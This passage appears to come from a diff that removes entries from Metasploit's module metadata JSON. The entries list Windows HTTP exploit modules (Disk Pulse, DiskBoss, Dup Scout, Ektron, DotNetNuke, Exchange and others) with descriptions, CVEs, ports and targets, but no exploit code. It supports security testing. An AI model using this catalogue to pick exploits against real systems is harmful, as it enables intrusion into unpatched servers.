Some early builds of version 7 are not exploitable as\n they do not ship with a bundled Java compiler.", - "references": [ - "CVE-2014-5005", - "OSVDB-110643", - "URL-https://seclists.org/fulldisclosure/2014/Aug/88" - ], - "platform": "Windows", - "arch": "x86", - "rport": 8020, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Desktop Central v7 to v9 build 90054 / Windows" - ], - "mod_time": "2021-02-17 12:33:59 +0000", - "path": "/modules/exploits/windows/http/desktopcentral_statusupdate_upload.rb", - "is_install_path": true, - "ref_name": "windows/http/desktopcentral_statusupdate_upload", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": true - }, - "exploit_windows/http/disk_pulse_enterprise_bof": { - "name": "Disk Pulse Enterprise Login Buffer Overflow", - "fullname": "exploit/windows/http/disk_pulse_enterprise_bof", - "aliases": [], - "rank": 600, - "disclosure_date": "2016-10-03", - "type": "exploit", - "author": [ - "Chris Higgins", - "Tulpa Security" - ], - "description": "This module exploits a stack buffer overflow in Disk Pulse Enterprise\n 9.0.34. If a malicious user sends a malicious HTTP login request,\n it is possible to execute a payload that would run under the Windows\n NT AUTHORITY\\SYSTEM account. 
Due to size constraints, this module\n uses the Egghunter technique.", - "references": [ - "EDB-40452" - ], - "platform": "Windows", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Disk Pulse Enterprise 9.0.34" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/disk_pulse_enterprise_bof.rb", - "is_install_path": true, - "ref_name": "windows/http/disk_pulse_enterprise_bof", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/disk_pulse_enterprise_get": { - "name": "Disk Pulse Enterprise GET Buffer Overflow", - "fullname": "exploit/windows/http/disk_pulse_enterprise_get", - "aliases": [], - "rank": 600, - "disclosure_date": "2017-08-25", - "type": "exploit", - "author": [ - "Chance Johnson", - "Nipun Jaswal & Anurag Srivastava" - ], - "description": "This module exploits an SEH buffer overflow in Disk Pulse Enterprise\n 9.9.16. 
If a malicious user sends a crafted HTTP GET request\n it is possible to execute a payload that would run under the Windows\n NT AUTHORITY\\SYSTEM account.", - "references": [ - "EDB-42560" - ], - "platform": "Windows", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Disk Pulse Enterprise 9.9.16" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/disk_pulse_enterprise_get.rb", - "is_install_path": true, - "ref_name": "windows/http/disk_pulse_enterprise_get", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/diskboss_get_bof": { - "name": "DiskBoss Enterprise GET Buffer Overflow", - "fullname": "exploit/windows/http/diskboss_get_bof", - "aliases": [], - "rank": 600, - "disclosure_date": "2016-12-05", - "type": "exploit", - "author": [ - "vportal", - "Ahmad Mahfouz", - "Gabor Seljan", - "Jacob Robles" - ], - "description": "This module exploits a stack-based buffer overflow vulnerability\n in the web interface of DiskBoss Enterprise v7.5.12, v7.4.28, and v8.2.14,\n caused by improper bounds checking of the request path in HTTP GET\n requests sent to the built-in web server. 
This module has been\n tested successfully on Windows XP SP3 and Windows 7 SP1.", - "references": [ - "EDB-40869", - "EDB-42395" - ], - "platform": "Windows", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Automatic Targeting", - "DiskBoss Enterprise v7.4.28", - "DiskBoss Enterprise v7.5.12", - "DiskBoss Enterprise v8.2.14" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/diskboss_get_bof.rb", - "is_install_path": true, - "ref_name": "windows/http/diskboss_get_bof", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/disksavvy_get_bof": { - "name": "DiskSavvy Enterprise GET Buffer Overflow", - "fullname": "exploit/windows/http/disksavvy_get_bof", - "aliases": [], - "rank": 600, - "disclosure_date": "2016-12-01", - "type": "exploit", - "author": [ - "vportal", - "Gabor Seljan" - ], - "description": "This module exploits a stack-based buffer overflow vulnerability\n in the web interface of DiskSavvy Enterprise v9.1.14 and v9.3.14,\n caused by improper bounds checking of the request path in HTTP GET\n requests sent to the built-in web server. 
This module has been\n tested successfully on Windows XP SP3 and Windows 7 SP1.", - "references": [ - "CVE-2017-6187", - "EDB-40869" - ], - "platform": "Windows", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Automatic Targeting", - "DiskSavvy Enterprise v9.1.14", - "DiskSavvy Enterprise v9.3.14" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/disksavvy_get_bof.rb", - "is_install_path": true, - "ref_name": "windows/http/disksavvy_get_bof", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/disksorter_bof": { - "name": "Disk Sorter Enterprise GET Buffer Overflow", - "fullname": "exploit/windows/http/disksorter_bof", - "aliases": [], - "rank": 500, - "disclosure_date": "2017-03-15", - "type": "exploit", - "author": [ - "Daniel Teixeira" - ], - "description": "This module exploits a stack-based buffer overflow vulnerability\n in the web interface of Disk Sorter Enterprise v9.5.12, caused by\n improper bounds checking of the request path in HTTP GET requests\n sent to the built-in web server. 
This module has been tested\n successfully on Windows 7 SP1 x86.", - "references": [ - "CVE-2017-7230" - ], - "platform": "Windows", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Disk Sorter Enterprise v9.5.12" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/disksorter_bof.rb", - "is_install_path": true, - "ref_name": "windows/http/disksorter_bof", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/dlink_central_wifimanager_rce": { - "name": "D-Link Central WiFi Manager CWM(100) RCE", - "fullname": "exploit/windows/http/dlink_central_wifimanager_rce", - "aliases": [], - "rank": 600, - "disclosure_date": "2019-07-09", - "type": "exploit", - "author": [ - "M3 ", - "Redouane NIBOUCHA " - ], - "description": "This module exploits a PHP code injection vulnerability in D-Link Central WiFi Manager CWM(100)\n versions below `v1.03R0100_BETA6`. 
The vulnerability exists in the\n username cookie, which is passed to `eval()` without being sanitized.\n Dangerous functions are not disabled by default, which makes it possible\n to get code execution on the target.", - "references": [ - "CVE-2019-13372", - "URL-https://unh3x.github.io/2019/02/21/D-link-(CWM-100)-Multiple-Vulnerabilities/" - ], - "platform": "PHP", - "arch": "php", - "rport": 443, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Automatic" - ], - "mod_time": "2023-02-10 18:04:31 +0000", - "path": "/modules/exploits/windows/http/dlink_central_wifimanager_rce.rb", - "is_install_path": true, - "ref_name": "windows/http/dlink_central_wifimanager_rce", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "ioc-in-logs" - ], - "Reliability": [ - "repeatable-session" - ] - }, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/dnn_cookie_deserialization_rce": { - "name": "DotNetNuke Cookie Deserialization Remote Code Excecution", - "fullname": "exploit/windows/http/dnn_cookie_deserialization_rce", - "aliases": [], - "rank": 600, - "disclosure_date": "2017-07-20", - "type": "exploit", - "author": [ - "Jon Park", - "Jon Seigel" - ], - "description": "This module exploits a deserialization vulnerability in DotNetNuke (DNN) versions 5.0.0 to 9.3.0-RC.\n Vulnerable versions store profile information for users in the DNNPersonalization cookie as XML.\n The expected structure includes a \"type\" attribute to instruct the server which type of object to create on deserialization.\n The cookie is processed by the application whenever it attempts to load the current user's profile data.\n This occurs when DNN is configured to handle 404 errors with its built-in error page (default configuration).\n An attacker can leverage this 
vulnerability to execute arbitrary code on the system.", - "references": [ - "CVE-2017-9822", - "CVE-2018-15811", - "CVE-2018-15812", - "CVE-2018-18325", - "CVE-2018-18326", - "URL-https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-Json-Attacks.pdf", - "URL-https://googleprojectzero.blogspot.com/2017/04/exploiting-net-managed-dcom.html", - "URL-https://github.com/pwntester/ysoserial.net" - ], - "platform": "Windows", - "arch": "x86, x64", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Automatic", - "v5.0 - v9.0.0", - "v9.0.1 - v9.1.1", - "v9.2.0 - v9.2.1", - "v9.2.2 - v9.3.0-RC" - ], - "mod_time": "2024-06-18 09:23:41 +0000", - "path": "/modules/exploits/windows/http/dnn_cookie_deserialization_rce.rb", - "is_install_path": true, - "ref_name": "windows/http/dnn_cookie_deserialization_rce", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [ - "repeatable-session" - ], - "SideEffects": [] - }, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/dup_scout_enterprise_login_bof": { - "name": "Dup Scout Enterprise Login Buffer Overflow", - "fullname": "exploit/windows/http/dup_scout_enterprise_login_bof", - "aliases": [], - "rank": 500, - "disclosure_date": "2017-11-14", - "type": "exploit", - "author": [ - "sickness", - "Chris Higgins", - "bcoles " - ], - "description": "This module exploits a stack buffer overflow in Dup Scout Enterprise\n versions <= 10.0.18. The buffer overflow exists via the web interface\n during login. 
This gives NT AUTHORITY\\SYSTEM access.\n\n This module has been tested successfully on Dup Scout Enterprise\n versions:\n\n 9.9.14 on Windows 7 SP1 (x64);\n 9.9.14 on Windows XP SP0 (x64);\n 10.0.18 on Windows 7 SP1 (x64);\n 10.0.18 on Windows XP SP0 (x86); and\n 10.0.18 on Windows 10 (1909) (x64).", - "references": [ - "CVE-2017-13696", - "CWE-121", - "EDB-42557", - "EDB-43145", - "EDB-40832" - ], - "platform": "Windows", - "arch": "x86", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Automatic", - "Dup Scout Enterprise 9.9.14 (x86)", - "Dup Scout Enterprise 10.0.18 (x86)" - ], - "mod_time": "2021-02-25 17:14:25 +0000", - "path": "/modules/exploits/windows/http/dup_scout_enterprise_login_bof.rb", - "is_install_path": true, - "ref_name": "windows/http/dup_scout_enterprise_login_bof", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-service-down" - ], - "SideEffects": [ - "ioc-in-logs" - ], - "Reliability": [ - "repeatable-session" - ] - }, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/dupscts_bof": { - "name": "Dup Scout Enterprise GET Buffer Overflow", - "fullname": "exploit/windows/http/dupscts_bof", - "aliases": [], - "rank": 500, - "disclosure_date": "2017-03-15", - "type": "exploit", - "author": [ - "vportal", - "Daniel Teixeira", - "bcoles " - ], - "description": "This module exploits a stack-based buffer overflow vulnerability\n in the web interface of Dup Scout Enterprise versions <= 10.0.18,\n caused by improper bounds checking of the request path in HTTP GET\n requests sent to the built-in web server which can be leveraged\n to execute arbitrary code in the context of NT AUTHORITY\\SYSTEM.\n\n This module supports x86 versions of Dup Scout Enterprise and x86\n Windows operating systems only and has been tested successfully on\n 
Windows 7 SP1 (x86) and Windows XP SP0 (x86).", - "references": [ - "CVE-2017-13696", - "CWE-121", - "EDB-42557", - "EDB-49217" - ], - "platform": "Windows", - "arch": "x86", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Automatic", - "Dup Scout Enterprise v8.3.16 (x86)", - "Dup Scout Enterprise v8.4.16 (x86)", - "Dup Scout Enterprise v9.0.28 (x86)", - "Dup Scout Enterprise v9.1.14 (x86)", - "Dup Scout Enterprise v9.5.14 (x86)", - "Dup Scout Enterprise v9.9.14 (x86)", - "Dup Scout Enterprise v10.0.18 (x86)" - ], - "mod_time": "2021-02-25 17:12:27 +0000", - "path": "/modules/exploits/windows/http/dupscts_bof.rb", - "is_install_path": true, - "ref_name": "windows/http/dupscts_bof", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-service-down" - ], - "SideEffects": [ - "ioc-in-logs" - ], - "Reliability": [ - "repeatable-session" - ] - }, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/easychatserver_seh": { - "name": "Easy Chat Server User Registeration Buffer Overflow (SEH)", - "fullname": "exploit/windows/http/easychatserver_seh", - "aliases": [], - "rank": 300, - "disclosure_date": "2017-10-09", - "type": "exploit", - "author": [ - "Marco Rivoli", - "Aitezaz Mohsin" - ], - "description": "This module exploits a buffer overflow during user registration in Easy Chat Server software.", - "references": [ - "EDB-42155" - ], - "platform": "Windows", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Easy Chat Server 2.0 to 3.1" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/easychatserver_seh.rb", - "is_install_path": true, - "ref_name": 
"windows/http/easychatserver_seh", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/easyfilesharing_post": { - "name": "Easy File Sharing HTTP Server 7.2 POST Buffer Overflow", - "fullname": "exploit/windows/http/easyfilesharing_post", - "aliases": [], - "rank": 300, - "disclosure_date": "2017-06-12", - "type": "exploit", - "author": [ - "bl4ck h4ck3r", - "Marco Rivoli " - ], - "description": "This module exploits a POST buffer overflow in the Easy File Sharing FTP Server 7.2 software.", - "references": [ - "EDB-42186" - ], - "platform": "Windows", - "arch": "", - "rport": 80, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Easy File Sharing 7.2 HTTP" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/easyfilesharing_post.rb", - "is_install_path": true, - "ref_name": "windows/http/easyfilesharing_post", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/easyfilesharing_seh": { - "name": "Easy File Sharing HTTP Server 7.2 SEH Overflow", - "fullname": "exploit/windows/http/easyfilesharing_seh", - "aliases": [], - "rank": 300, - "disclosure_date": "2015-12-02", - "type": "exploit", - "author": [ - "Starwarsfan2099 " - ], - "description": "This module exploits a SEH overflow in the Easy File Sharing FTP Server 7.2 software.", - "references": [ - "EDB-39008" - ], - "platform": "Windows", - "arch": "", - "rport": 80, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Easy File Sharing 7.2 HTTP" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/easyfilesharing_seh.rb", - "is_install_path": true, - "ref_name": "windows/http/easyfilesharing_seh", - "check": false, - "post_auth": false, - "default_credential": false, - 
"notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/easyftp_list": { - "name": "EasyFTP Server list.html path Stack Buffer Overflow", - "fullname": "exploit/windows/http/easyftp_list", - "aliases": [], - "rank": 500, - "disclosure_date": "2010-02-18", - "type": "exploit", - "author": [ - "ThE g0bL!N", - "jduck " - ], - "description": "This module exploits a stack-based buffer overflow in EasyFTP Server 1.7.0.11\n and earlier. EasyFTP fails to check input size when parsing the 'path' parameter\n supplied to an HTTP GET request, which leads to a stack based buffer overflow.\n EasyFTP allows anonymous access by default; valid credentials are typically\n unnecessary to exploit this vulnerability.\n\n After version 1.7.0.12, this package was renamed \"UplusFtp\".\n\n Due to limited space, as well as difficulties using an egghunter, the use of\n staged, ORD, and/or shell payloads is recommended.", - "references": [ - "OSVDB-66614", - "EDB-11500" - ], - "platform": "Windows", - "arch": "", - "rport": 8080, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Windows XP SP3 - Easy FTP Server Universal" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/easyftp_list.rb", - "is_install_path": true, - "ref_name": "windows/http/easyftp_list", - "check": true, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/edirectory_host": { - "name": "Novell eDirectory NDS Server Host Header Overflow", - "fullname": "exploit/windows/http/edirectory_host", - "aliases": [], - "rank": 500, - "disclosure_date": "2006-10-21", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a stack buffer overflow in Novell eDirectory 8.8.1.\n The web interface does not validate the length 
of the\n HTTP Host header prior to using the value of that header in an\n HTTP redirect.", - "references": [ - "CVE-2006-5478", - "OSVDB-29993", - "BID-20655" - ], - "platform": "Windows", - "arch": "", - "rport": 8028, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Novell eDirectory 8.8.1" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/edirectory_host.rb", - "is_install_path": true, - "ref_name": "windows/http/edirectory_host", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/edirectory_imonitor": { - "name": "eDirectory 8.7.3 iMonitor Remote Stack Buffer Overflow", - "fullname": "exploit/windows/http/edirectory_imonitor", - "aliases": [], - "rank": 500, - "disclosure_date": "2005-08-11", - "type": "exploit", - "author": [ - "Unknown", - "Matt Olney " - ], - "description": "This module exploits a stack buffer overflow in eDirectory 8.7.3\n iMonitor service. This vulnerability was discovered by Peter\n Winter-Smith of NGSSoftware.\n\n NOTE: repeated exploitation attempts may cause eDirectory to crash. 
It does\n not restart automatically in a default installation.", - "references": [ - "CVE-2005-2551", - "OSVDB-18703", - "BID-14548" - ], - "platform": "Windows", - "arch": "", - "rport": 8008, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Windows (ALL) - eDirectory 8.7.3 iMonitor" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/edirectory_imonitor.rb", - "is_install_path": true, - "ref_name": "windows/http/edirectory_imonitor", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/efs_easychatserver_username": { - "name": "EFS Easy Chat Server Authentication Request Handling Buffer Overflow", - "fullname": "exploit/windows/http/efs_easychatserver_username", - "aliases": [], - "rank": 500, - "disclosure_date": "2007-08-14", - "type": "exploit", - "author": [ - "LSO ", - "bcoles " - ], - "description": "This module exploits a stack buffer overflow in EFS Software Easy Chat\n Server versions 2.0 to 3.1. 
By sending an overly long authentication\n request, an attacker may be able to execute arbitrary code.", - "references": [ - "CVE-2004-2466", - "OSVDB-7416", - "OSVDB-106841", - "BID-25328" - ], - "platform": "Windows", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Automatic Targeting", - "Easy Chat Server 2.0", - "Easy Chat Server 2.1 - 3.1" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/efs_easychatserver_username.rb", - "is_install_path": true, - "ref_name": "windows/http/efs_easychatserver_username", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/efs_fmws_userid_bof": { - "name": "Easy File Management Web Server Stack Buffer Overflow", - "fullname": "exploit/windows/http/efs_fmws_userid_bof", - "aliases": [], - "rank": 300, - "disclosure_date": "2014-05-20", - "type": "exploit", - "author": [ - "superkojiman", - "Julien Ahrens", - "TecR0c " - ], - "description": "Easy File Management Web Server v4.0 and v5.3 contains a stack buffer\n overflow condition that is triggered as user-supplied input is not\n properly validated when handling the UserID cookie. 
This may allow a\n remote attacker to execute arbitrary code.", - "references": [ - "CVE-2014-3791", - "OSVDB-107241", - "EDB-33610", - "BID-67542", - "URL-http://www.cnnvd.org.cn/vulnerability/show/cv_id/2014050536", - "URL-http://www.web-file-management.com/" - ], - "platform": "Windows", - "arch": "x86", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Automatic Targeting", - "Efmws 5.3 Universal", - "Efmws 4.0 Universal" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/efs_fmws_userid_bof.rb", - "is_install_path": true, - "ref_name": "windows/http/efs_fmws_userid_bof", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/ektron_xslt_exec": { - "name": "Ektron 8.02 XSLT Transform Remote Code Execution", - "fullname": "exploit/windows/http/ektron_xslt_exec", - "aliases": [], - "rank": 600, - "disclosure_date": "2012-10-16", - "type": "exploit", - "author": [ - "Rich Lundeen", - "juan vazquez ", - "Nicolas \"Nicob\" Gregoire" - ], - "description": "This module exploits a vulnerability in Ektron CMS 8.02 (before SP5). The\n vulnerability exists due to the insecure usage of XslCompiledTransform, using a\n XSLT controlled by the user. 
The module has been tested successfully on Ektron CMS\n 8.02 over Windows 2003 SP2, which allows to execute arbitrary code with NETWORK\n SERVICE privileges.", - "references": [ - "CVE-2012-5357", - "OSVDB-88107", - "URL-http://webstersprodigy.net/2012/10/25/cve-2012-5357cve-1012-5358-cool-ektron-xslt-rce-bugs/", - "URL-http://technet.microsoft.com/en-us/security/msvr/msvr12-016" - ], - "platform": "Windows", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Windows 2003 SP2 / Ektron CMS400 8.02" - ], - "mod_time": "2020-09-22 02:56:51 +0000", - "path": "/modules/exploits/windows/http/ektron_xslt_exec.rb", - "is_install_path": true, - "ref_name": "windows/http/ektron_xslt_exec", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/ektron_xslt_exec_ws": { - "name": "Ektron 8.5, 8.7, 9.0 XSLT Transform Remote Code Execution", - "fullname": "exploit/windows/http/ektron_xslt_exec_ws", - "aliases": [], - "rank": 600, - "disclosure_date": "2015-02-05", - "type": "exploit", - "author": [ - "catatonicprime" - ], - "description": "Ektron 8.5, 8.7 <= sp1, 9.0 < sp1 have\nvulnerabilities in various operations within the ServerControlWS.asmx\nweb services. 
These vulnerabilities allow for RCE without authentication and\nexecute in the context of IIS on the remote system.", - "references": [ - "CVE-2015-0923", - "US-CERT-VU-377644", - "URL-http://www.websecuritywatch.com/xxe-arbitrary-code-execution-in-ektron-cms/" - ], - "platform": "Windows", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Windows 2008 R2 / Ektron CMS400 8.5" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/ektron_xslt_exec_ws.rb", - "is_install_path": true, - "ref_name": "windows/http/ektron_xslt_exec_ws", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/ericom_access_now_bof": { - "name": "Ericom AccessNow Server Buffer Overflow", - "fullname": "exploit/windows/http/ericom_access_now_bof", - "aliases": [], - "rank": 300, - "disclosure_date": "2014-06-02", - "type": "exploit", - "author": [ - "Unknown", - "juan vazquez " - ], - "description": "This module exploits a stack based buffer overflow in Ericom AccessNow Server. The\n vulnerability is due to an insecure usage of vsprintf with user controlled data,\n which can be triggered with a malformed HTTP request. 
This module has been tested\n successfully with Ericom AccessNow Server 2.4.0.2 on Windows XP SP3 and Windows 2003\n Server SP2.", - "references": [ - "ZDI-14-160", - "CVE-2014-3913", - "BID-67777", - "URL-http://www.ericom.com/security-ERM-2014-610.asp" - ], - "platform": "Windows", - "arch": "x86", - "rport": 8080, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Ericom AccessNow Server 2.4.0.2 / Windows [XP SP3 / 2003 SP2]" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/ericom_access_now_bof.rb", - "is_install_path": true, - "ref_name": "windows/http/ericom_access_now_bof", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/exchange_chainedserializationbinder_rce": { - "name": "Microsoft Exchange Server ChainedSerializationBinder RCE", - "fullname": "exploit/windows/http/exchange_chainedserializationbinder_rce", - "aliases": [ - "exploit/windows/http/exchange_chainedserializationbinder_denylist_typo_rce" - ], - "rank": 600, - "disclosure_date": "2021-12-09", - "type": "exploit", - "author": [ - "pwnforsp", - "zcgonvh", - "Microsoft Threat Intelligence Center", - "Microsoft Security Response Center", - "peterjson", - "testanull", - "Grant Willcox", - "Spencer McIntyre", - "Markus Wulftange" - ], - "description": "This module exploits vulnerabilities within the ChainedSerializationBinder as used in\n Exchange Server 2019 CU10, Exchange Server 2019 CU11, Exchange Server 2016 CU21, and\n Exchange Server 2016 CU22 all prior to Mar22SU.\n\n Note that authentication is required to exploit these vulnerabilities.", - "references": [ - "CVE-2021-42321", - "URL-https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-42321", - 
"URL-https://support.microsoft.com/en-us/topic/description-of-the-security-update-for-microsoft-exchange-server-2019-2016-and-2013-november-9-2021-kb5007409-7e1f235a-d41b-4a76-bcc4-3db90cd161e7", - "URL-https://techcommunity.microsoft.com/t5/exchange-team-blog/released-november-2021-exchange-server-security-updates/ba-p/2933169", - "URL-https://gist.github.com/testanull/0188c1ae847f37a70fe536123d14f398", - "URL-https://peterjson.medium.com/some-notes-about-microsoft-exchange-deserialization-rce-cve-2021-42321-110d04e8852", - "CVE-2022-23277", - "URL-https://codewhitesec.blogspot.com/2022/06/bypassing-dotnet-serialization-binders.html", - "URL-https://testbnull.medium.com/note-nhanh-v%E1%BB%81-binaryformatter-binder-v%C3%A0-cve-2022-23277-6510d469604c" - ], - "platform": "Windows", - "arch": "cmd, x86, x64", - "rport": 443, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Windows Command", - "Windows Dropper", - "PowerShell Stager" - ], - "mod_time": "2022-08-17 17:36:31 +0000", - "path": "/modules/exploits/windows/http/exchange_chainedserializationbinder_rce.rb", - "is_install_path": true, - "ref_name": "windows/http/exchange_chainedserializationbinder_rce", - "check": true, - "post_auth": true, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [ - "repeatable-session" - ], - "SideEffects": [ - "ioc-in-logs", - "config-changes" - ] - }, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/exchange_ecp_dlp_policy": { - "name": "Microsoft Exchange Server DlpUtils AddTenantDlpPolicy RCE", - "fullname": "exploit/windows/http/exchange_ecp_dlp_policy", - "aliases": [], - "rank": 600, - "disclosure_date": "2021-01-12", - "type": "exploit", - "author": [ - "Leonard Rapp", - "Markus Vervier", - "Steven Seeley", - "Yasar Klawohn", - "wvu ", - "Spencer McIntyre" - ], - "description": 
